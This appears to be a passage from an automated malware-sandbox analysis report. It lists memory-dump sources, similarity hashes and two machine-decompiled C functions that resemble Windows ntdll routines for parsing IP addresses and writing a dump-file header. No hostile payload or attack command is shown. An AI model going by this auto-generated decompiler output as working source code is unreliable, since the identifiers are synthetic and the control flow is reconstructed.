                                                                                                                                                                0x00b5eb99
                                                                                                                                                                0x00b5ec85
                                                                                                                                                                0x00b5ec85
                                                                                                                                                                0x00b5ec85
                                                                                                                                                                0x00000000

                                                                                                                                                                Strings
                                                                                                                                                                • RTL: Re-Waiting, xrefs: 00B924FA
                                                                                                                                                                • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00B924BD
                                                                                                                                                                • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00B9248D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                                • API String ID: 0-3177188983
                                                                                                                                                                • Opcode ID: e62b32b780dde0b148e62ffcb6392abdd36aa982eb11b48d92c5380fb5ee2748
                                                                                                                                                                • Instruction ID: e209ae19d1a81d21385a1e591bb26d8dfa3ebd1b22f42e6ebb8489819d177827
                                                                                                                                                                • Opcode Fuzzy Hash: e62b32b780dde0b148e62ffcb6392abdd36aa982eb11b48d92c5380fb5ee2748
                                                                                                                                                                • Instruction Fuzzy Hash: 1B41C670A00204BBDB24DB68CC85FAA77F9EF45720F2086D5FA699B3D1D774EA418760
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B6FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                			E00B6FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E00B6EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E00B6EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E00B6685D(_t167, 4) == 0) {
								if(E00B6685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E00B6685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E00B6685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E00B48980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E00B3DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E00B6EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E00B6EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                                                                                                                                                0x00b6fcd1
                                                                                                                                                                0x00b6fcd6
                                                                                                                                                                0x00b6fcd9
                                                                                                                                                                0x00b6fcdc
                                                                                                                                                                0x00b6fcdf
                                                                                                                                                                0x00b6fce2
                                                                                                                                                                0x00b6fce5
                                                                                                                                                                0x00b6fce8
                                                                                                                                                                0x00b6fceb
                                                                                                                                                                0x00b6fced
                                                                                                                                                                0x00b6fced
                                                                                                                                                                0x00b6fcf3
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b6fcfc
                                                                                                                                                                0x00b6fcfe
                                                                                                                                                                0x00b6fdc1
                                                                                                                                                                0x00b9ecbd
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9eccc
                                                                                                                                                                0x00b9eccc
                                                                                                                                                                0x00b9ecd2
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9ecdf
                                                                                                                                                                0x00b9ece0
                                                                                                                                                                0x00b9ece4
                                                                                                                                                                0x00b9eceb
                                                                                                                                                                0x00b9ecee
                                                                                                                                                                0x00b9eca8
                                                                                                                                                                0x00b9eca8
                                                                                                                                                                0x00b9ecaa
                                                                                                                                                                0x00b6fd76
                                                                                                                                                                0x00b6fd79
                                                                                                                                                                0x00b6fdb4
                                                                                                                                                                0x00b6fdb5
                                                                                                                                                                0x00b6fdb6
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b6fdb6
                                                                                                                                                                0x00b6fd7e
                                                                                                                                                                0x00b9ecfc
                                                                                                                                                                0x00b6fe2f
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b6fe2f
                                                                                                                                                                0x00b9ed08
                                                                                                                                                                0x00b9ed0f
                                                                                                                                                                0x00b9ed17
                                                                                                                                                                0x00b9ed1b
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9ed1b
                                                                                                                                                                0x00b6fd88
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b6fd94
                                                                                                                                                                0x00b6fd99
                                                                                                                                                                0x00b6fda1
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b6fdb0
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b6fdb0
                                                                                                                                                                0x00b9ecbd
                                                                                                                                                                0x00b6fdc7
                                                                                                                                                                0x00b6fdcb
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b6fdd7
                                                                                                                                                                0x00b6fde3
                                                                                                                                                                0x00b6fe06
                                                                                                                                                                0x00b81fe7
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b81fef
                                                                                                                                                                0x00b81ff0
                                                                                                                                                                0x00b81ff4
                                                                                                                                                                0x00b81ff7
                                                                                                                                                                0x00b81ffa
                                                                                                                                                                0x00b81ffd
                                                                                                                                                                0x00b82000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9ecf1
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9ecf1
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b6fe06
                                                                                                                                                                0x00b6fde8
                                                                                                                                                                0x00b6fdec
                                                                                                                                                                0x00b6fdef
                                                                                                                                                                0x00b6fdf2
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b6fdf2
                                                                                                                                                                0x00b6fdcb
                                                                                                                                                                0x00b6fd04
                                                                                                                                                                0x00b6fd05
                                                                                                                                                                0x00b9ec67
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9ec6f
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9ec6f
                                                                                                                                                                0x00b6fd13
                                                                                                                                                                0x00b6fd3c
                                                                                                                                                                0x00b6fd40
                                                                                                                                                                0x00b9ec75
                                                                                                                                                                0x00b9ec7a
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9ec8a
                                                                                                                                                                0x00b9ec8a
                                                                                                                                                                0x00b9ec90
                                                                                                                                                                0x00b9ecb2
                                                                                                                                                                0x00b6fd73
                                                                                                                                                                0x00b6fd73
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b6fd73
                                                                                                                                                                0x00b9ec95
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9eca1
                                                                                                                                                                0x00b9eca4
                                                                                                                                                                0x00b9eca5
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9eca5
                                                                                                                                                                0x00b9ec7a
                                                                                                                                                                0x00b6fd4a
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b6fd6e
                                                                                                                                                                0x00b6fd6e
                                                                                                                                                                0x00b6fd71
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b6fd71
                                                                                                                                                                0x00b6fd4a
                                                                                                                                                                0x00b6fd21
                                                                                                                                                                0x00b7a3a1
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b7a3a1
                                                                                                                                                                0x00b6fd36
                                                                                                                                                                0x00b8200b
                                                                                                                                                                0x00b82012
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b82018
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b82018
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b6fd36
                                                                                                                                                                0x00b6fe0f
                                                                                                                                                                0x00b6fe16
                                                                                                                                                                0x00b7a3ad
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b7a3b3
                                                                                                                                                                0x00b7a3b3
                                                                                                                                                                0x00b6fe1f
                                                                                                                                                                0x00b9ed25
                                                                                                                                                                0x00b9ed86
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9ed91
                                                                                                                                                                0x00b9ed95
                                                                                                                                                                0x00b9ed95
                                                                                                                                                                0x00b9ed9a
                                                                                                                                                                0x00b9edad
                                                                                                                                                                0x00b9edb3
                                                                                                                                                                0x00b9edba
                                                                                                                                                                0x00b9edc4
                                                                                                                                                                0x00b9edc9
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9edcc
                                                                                                                                                                0x00b9ed2a
                                                                                                                                                                0x00b9ed55
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9ed61
                                                                                                                                                                0x00b9ed66
                                                                                                                                                                0x00b9ed6e
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9ed7d
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9ed7d
                                                                                                                                                                0x00b9ed30
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9ed3c
                                                                                                                                                                0x00b9ed43
                                                                                                                                                                0x00b9ed4b
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __fassign
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3965848254-0
                                                                                                                                                                • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                                • Instruction ID: 1ee0fc6cb7031e397860ece37207457877ad8a6980b51314c9df2dca2910711e
                                                                                                                                                                • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                                • Instruction Fuzzy Hash: F691AF71E0020AEBDF24DF68D8456BEBBF4FF55304F2080BAD411A7162E739AA51CB91
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00BEE9FF, Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 435COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                C-Code - Quality: 80%
                                                                                                                                                                			E00BEE9FF(void* __edx, signed int _a4, intOrPtr _a8, char _a12) {
				signed int _v5;
				int _v12;
				signed int _v16;
				char _v20;
				int _v24;
				signed int _v28;
				int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				char _v60;
				signed int _v64;
				char _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void _v96;
				char _v100;
				void _v140;
				char _v144;
				intOrPtr _v160;
				intOrPtr _v164;
				char _v172;
				char _v216;
				char _v220;
				void* __edi;
				void* __esi;
				void* _t231;
				signed char _t233;
				signed int _t237;
				signed int _t238;
				signed int _t244;
				short _t251;
				signed int _t253;
				signed int* _t254;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t260;
				signed int _t267;
				signed int _t271;
				intOrPtr _t281;
				signed int _t314;
				signed char _t316;
				signed int _t319;
				signed int _t322;
				signed int _t323;
				signed int _t326;
				signed int _t328;
				signed int _t330;
				signed int _t332;
				signed int _t334;
				int _t340;
				intOrPtr* _t341;
				signed int _t342;
				signed int _t343;
				signed int _t345;
				signed int _t347;
				signed int _t352;
				void* _t360;
				intOrPtr* _t370;
				intOrPtr _t371;
				intOrPtr* _t372;

				_t360 = __edx;
				_t340 = 0;
				_t345 = 0xa;
				_v144 = 0;
				memset( &_v140, 0, _t345 << 2);
				_v20 = 0;
				_v220 = 0;
				E00B3DFC0( &_v216, 0, 0x2c);
				_t371 = _a8;
				_t347 = 7;
				_v100 = 0;
				_t231 = memset( &_v96, 0, _t347 << 2);
				_t348 = 0;
				_v12 = 0;
				_v32 = 0;
				_v24 = 0;
				_v5 = _t231;
				if(_t371 != 0) {
					_v5 = 1;
				}
				_t370 = _a4;
				_t233 =  *(_t370 + 0xcc) >> 3;
				_t380 = _t233 & 0x00000001;
				if((_t233 & 0x00000001) != 0) {
					E00BEE919(_t360, _t380, _t370 + 0x70, _t370 + 0x78, _t370 + 0x68);
				}
				_v52 =  *((intOrPtr*)(_t370 + 0x6c));
				_v16 =  *(_t370 + 0x80);
				if(_v5 != _t340) {
					_t42 = _t371 + 0x20; // 0xbec2d6
					_v32 = _t42;
					_t44 = _t371 + 4; // 0x5bcd335e
					_t237 =  *_t44 & 0x0000ffff;
					_v24 = _t237;
					_t238 = _t237 + 0x48;
					__eflags = _t238;
					L12:
					_v28 = _t238;
					_t372 = E00B3E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _v16);
					if(_t372 != _t340) {
						_t54 = _t372 + 0x48; // 0x48
						_t341 = _t54;
						_t244 = E00BEE519(_t360, _v52, 0xc0000000, 1,  &_a12, 0x20000080,  &_v12);
						__eflags = _t244;
						_a4 = _t244;
						if(_t244 < 0) {
							L49:
							__eflags = _v12;
							if(_v12 != 0) {
								E00B2F9F0(_v12);
							}
							L51:
							_t340 = 0;
							__eflags = 0;
							L52:
							if(_t372 != _t340) {
								E00B3E025(_t348,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t340, _t372);
							}
							L54:
							return _a4;
						}
						__eflags = _a12 - 1;
						if(_a12 != 1) {
							 *_t372 = _v16;
							_t251 = 4;
							 *((short*)(_t372 + 0x36)) = _t251;
							 *((short*)(_t372 + 0x34)) = 1;
							_t253 = _v28;
							 *((char*)(_t372 + 0x29)) = 8;
							 *(_t372 + 0x30) = _t253;
							__eflags = _v5;
							if(_v5 != 0) {
								_t254 = _v32;
								_t254[8] =  *(_t370 + 0xcc) & 0x00101000 | 0x00010001;
								_t254[9] = 1;
								 *_t254 =  *(_t370 + 0x80);
								 *((char*)(_t372 + 0x6e)) = 1;
								 *((char*)(_t372 + 0x6f)) = 5;
								__eflags = _t254[0xb] - 8;
								if(_t254[0xb] != 8) {
									_t187 =  &(_t254[0x42]); // 0xf938e834
									_t255 =  *_t187;
								} else {
									_t186 =  &(_t254[0x44]); // 0x14538910
									_t255 =  *_t186;
								}
								 *(_t370 + 0x10) = _t255;
								E00B32340(_t341, _a8, _v24);
								L39:
								_t257 =  *(_t372 + 0x30);
								_t342 = _v16;
								__eflags = _t257 - _t342;
								if(_t257 < _t342) {
									__eflags = _t257 - 0x48;
									if(_t257 > 0x48) {
										__eflags = _t257 + _t372;
										E00B3DFC0(_t257 + _t372, 0xff, _t342 - _t257);
									}
								}
								_push(0);
								_push(0);
								_push(_t342);
								_push(_t372);
								_t348 =  &_v60;
								_push( &_v60);
								_push(0);
								_push(0);
								_push(0);
								_t259 = E00B2F938(_v12);
								_a4 = _t259;
								__eflags = _t259;
								if(_t259 < 0) {
									goto L49;
								} else {
									_t260 =  *(_t370 + 0xc8);
									__eflags = _t260;
									if(_t260 == 0) {
										L48:
										_t348 = _v12;
										 *(_t370 + 0x100) = 1;
										 *(_t370 + 0xd8) = 1;
										__eflags = 0;
										 *(_t370 + 0xf0) = _t342;
										 *(_t370 + 0xf4) = 0;
										 *(_t370 + 0xe8) = _t342;
										 *(_t370 + 0xec) = 0;
										 *(_t370 + 0x5c) = _v12;
										_v12 = 0;
										goto L49;
									}
									_t352 =  *(_t370 + 0xcc);
									__eflags = _t352 & 0x00000020;
									if((_t352 & 0x00000020) == 0) {
										goto L48;
									}
									__eflags = _t352 & 0x00002000;
									_t348 = 0x400;
									if((_t352 & 0x00002000) == 0) {
										_t348 = 0x100000;
									}
									_push(0x14);
									_v40 = _t260 * _t348;
									_push(8);
									_push( &_v40);
									_push( &_v60);
									_v36 = _t260 * _t348 >> 0x20;
									_t267 = E00B2FC48(_v12);
									_a4 = _t267;
									__eflags = _t267;
									if(_t267 < 0) {
										goto L49;
									} else {
										goto L48;
									}
								}
							}
							 *((intOrPtr*)(_t341 + 4)) = _t253 + 0xffffffb8;
							 *_t341 = 0xc0010000;
							_t271 =  *(_t370 + 0x10);
							__eflags = _t271 - 2;
							if(_t271 != 2) {
								__eflags = _t271 - 3;
								if(_t271 != 3) {
									_v48 = 0;
									_v44 = 0;
									E00B42954(1, _t372,  &_v48);
									 *(_t341 + 0x10) = _v48;
									 *((intOrPtr*)(_t341 + 0x14)) = _v44;
									L34:
									 *((intOrPtr*)(_t341 + 0xc)) = _v164;
									 *((intOrPtr*)(_t341 + 8)) = _v160;
									 *((intOrPtr*)(_t341 + 0x18)) = E00B74FC0(_v84, _v80, _v140, 0);
									 *((intOrPtr*)(_t341 + 0x1c)) = E00B74FC0(_v76, _v72, _v140, 0);
									_t281 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
									 *((char*)(_t372 + 0x6c)) =  *((intOrPtr*)(_t281 + 0xa4));
									 *((char*)(_t372 + 0x6d)) =  *((intOrPtr*)(_t281 + 0xa8));
									 *((char*)(_t372 + 0x6e)) = 1;
									 *((char*)(_t372 + 0x6f)) = 5;
									 *(_t372 + 0x70) =  *(_t281 + 0xac) & 0x0000ffff;
									 *(_t372 + 0x170) =  *(_t370 + 0x10);
									 *(_t372 + 0x74) =  *(_t370 + 0x7c);
									 *((intOrPtr*)(_t372 + 0x90)) = 1;
									 *(_t372 + 0x8c) = 1;
									 *((intOrPtr*)(_t372 + 0x94)) = 4;
									 *((intOrPtr*)(_t372 + 0x68)) = _v16;
									 *(_t372 + 0x84) =  *(_t370 + 0xc8);
									 *(_t372 + 0x88) =  *(_t370 + 0xcc);
									 *((intOrPtr*)(_t372 + 0x80)) = _v140;
									 *((intOrPtr*)(_t372 + 0x158)) = _v220;
									 *(_t372 + 0xa0) =  *(_t372 + 0xa0) & 0x00000000;
									 *(_t372 + 0xa4) =  *(_t372 + 0xa4) & 0x00000000;
									 *((intOrPtr*)(_t372 + 0x15c)) = _v216;
									 *((intOrPtr*)(_t372 + 0x9c)) = _v20;
									_t163 = _t372 + 0x178; // 0x178
									E00B32340(_t163,  *((intOrPtr*)(_t370 + 0x64)), ( *(_t370 + 0x60) & 0x0000ffff) + 2);
									E00B32340(( *(_t370 + 0x60) & 0x0000ffff) + _t372 + 0x17a,  *((intOrPtr*)(_t370 + 0x6c)), ( *(_t370 + 0x68) & 0x0000ffff) + 2);
									_t169 = _t372 + 0xa8; // 0xa8
									E00BEE649(0, _t370, _t372, _t169);
									_t170 = _t372 + 0x160; // 0x160
									E00B4B2FA(_v16, 0, _t170);
									 *((intOrPtr*)(_t372 + 0x168)) =  *_t370;
									 *((intOrPtr*)(_t372 + 0x16c)) =  *((intOrPtr*)(_t370 + 4));
									 *(_t341 + 0x10) =  *(_t370 + 8);
									 *((intOrPtr*)(_t341 + 0x14)) =  *((intOrPtr*)(_t370 + 0xc));
									goto L39;
								}
								asm("rdtsc");
								L32:
								 *(_t341 + 0x10) = _t271;
								 *((intOrPtr*)(_t341 + 0x14)) = 0;
								goto L34;
							}
							_t271 = E00BEBCFC();
							goto L32;
						}
						_push(0);
						_push( &_v68);
						_push(_v16);
						_push(_t372);
						_push( &_v60);
						_push(0);
						_push(0);
						_push(0);
						_v68 = 0;
						_v64 = 0;
						_t314 = E00B2F900(_v12);
						_a4 = _t314;
						__eflags = _t314;
						if(_t314 < 0) {
							goto L49;
						}
						_t316 =  *(_t372 + 0x88) >> 1;
						__eflags = _t316 & 0x00000001;
						if((_t316 & 0x00000001) == 0) {
							__eflags =  *((intOrPtr*)(_t372 + 0x6c)) -  *0x7ffe026c;
							if( *((intOrPtr*)(_t372 + 0x6c)) !=  *0x7ffe026c) {
								goto L18;
							}
							__eflags =  *((intOrPtr*)(_t372 + 0x6d)) -  *0x7ffe0270;
							if( *((intOrPtr*)(_t372 + 0x6d)) !=  *0x7ffe0270) {
								goto L18;
							}
							__eflags =  *((intOrPtr*)(_t372 + 0x94)) - 4;
							if( *((intOrPtr*)(_t372 + 0x94)) != 4) {
								goto L18;
							}
							_t319 =  *((intOrPtr*)(_t372 + 0x68));
							_t343 =  *(_t372 + 0x8c);
							_v16 = _t319;
							__eflags = _t319 + 0xfffffc00 - 0xffc00;
							if(_t319 + 0xfffffc00 > 0xffc00) {
								goto L18;
							}
							__eflags = _t343;
							if(_t343 == 0) {
								goto L18;
							}
							_t348 =  *(_t372 + 0x78) |  *(_t372 + 0x7c);
							__eflags =  *(_t372 + 0x78) |  *(_t372 + 0x7c);
							if(( *(_t372 + 0x78) |  *(_t372 + 0x7c)) == 0) {
								goto L18;
							}
							_t348 =  *(_t372 + 0x74);
							__eflags =  *(_t372 + 0x74) -  *(_t370 + 0x7c);
							if( *(_t372 + 0x74) !=  *(_t370 + 0x7c)) {
								goto L18;
							}
							_push(0);
							_push( &_v68);
							 *(_t372 + 0x78) = 0;
							 *(_t372 + 0x7c) = 0;
							_push( *(_t370 + 0x80));
							_t348 =  &_v60;
							_push(_t372);
							_push( &_v60);
							_push(0);
							_push(0);
							_push(0);
							_t322 = E00B2F938(_v12);
							 *(_t370 + 0xec) =  *(_t370 + 0xec) & 0x00000000;
							_a4 = _t322;
							_t323 = _v16;
							 *(_t370 + 0x100) = _t343;
							 *(_t370 + 0xd8) = _t343;
							 *(_t370 + 0xf4) =  *(_t370 + 0xf4) & 0x00000000;
							 *(_t370 + 0x80) = _t323;
							 *(_t370 + 0xe8) = _t323;
							 *(_t370 + 0xf0) = _t343 * _t323;
							 *(_t370 + 0x5c) = _v12;
							goto L51;
						}
						L18:
						_a4 = 0xc000000d;
						goto L49;
					}
					_a4 = 0xc0000017;
					goto L52;
				}
				_push(_t340);
				_push(0x2c);
				_push( &_v144);
				_t326 = E00B2FDC0(_t340);
				_a4 = _t326;
				if(_t326 < _t340) {
					goto L54;
				}
				_push(_t340);
				_push(0x1c);
				_push( &_v172);
				_push(_t340);
				_t328 = E00B2FC18(0xfffffffe);
				_a4 = _t328;
				if(_t328 < _t340) {
					goto L54;
				}
				_push(_t340);
				_push(0x20);
				_push( &_v100);
				_push(1);
				_t330 = E00B2FC18(0xfffffffe);
				_a4 = _t330;
				if(_t330 < _t340) {
					goto L54;
				}
				_push(_t340);
				_push(0x30);
				_push( &_v220);
				_t332 = E00B2FDC0(3);
				_a4 = _t332;
				if(_t332 < _t340) {
					goto L54;
				}
				_t334 = E00B88001(_t348, _t360, _t370, _t340,  &_v20);
				_a4 = _t334;
				if(_t334 < _t340) {
					goto L54;
				}
				_t348 =  *(_t370 + 0x60) & 0x0000ffff;
				_t238 = ( *(_t370 + 0x68) & 0x0000ffff) + ( *(_t370 + 0x60) & 0x0000ffff) + 0x17c;
				goto L12;
			}





































































                                                                                                                                                                0x00bee9ff
                                                                                                                                                                0x00beea0f
                                                                                                                                                                0x00beea11
                                                                                                                                                                0x00beea1c
                                                                                                                                                                0x00beea22
                                                                                                                                                                0x00beea2c
                                                                                                                                                                0x00beea2f
                                                                                                                                                                0x00beea35
                                                                                                                                                                0x00beea3a
                                                                                                                                                                0x00beea44
                                                                                                                                                                0x00beea48
                                                                                                                                                                0x00beea4b
                                                                                                                                                                0x00beea4b
                                                                                                                                                                0x00beea4d
                                                                                                                                                                0x00beea50
                                                                                                                                                                0x00beea53
                                                                                                                                                                0x00beea56
                                                                                                                                                                0x00beea5b
                                                                                                                                                                0x00beea5d
                                                                                                                                                                0x00beea5d
                                                                                                                                                                0x00beea61
                                                                                                                                                                0x00beea6a
                                                                                                                                                                0x00beea6d
                                                                                                                                                                0x00beea6f
                                                                                                                                                                0x00beea7d
                                                                                                                                                                0x00beea7d
                                                                                                                                                                0x00beea85
                                                                                                                                                                0x00beea8e
                                                                                                                                                                0x00beea94
                                                                                                                                                                0x00beeb2f
                                                                                                                                                                0x00beeb32
                                                                                                                                                                0x00beeb35
                                                                                                                                                                0x00beeb35
                                                                                                                                                                0x00beeb39
                                                                                                                                                                0x00beeb3c
                                                                                                                                                                0x00beeb3c
                                                                                                                                                                0x00beeb3f
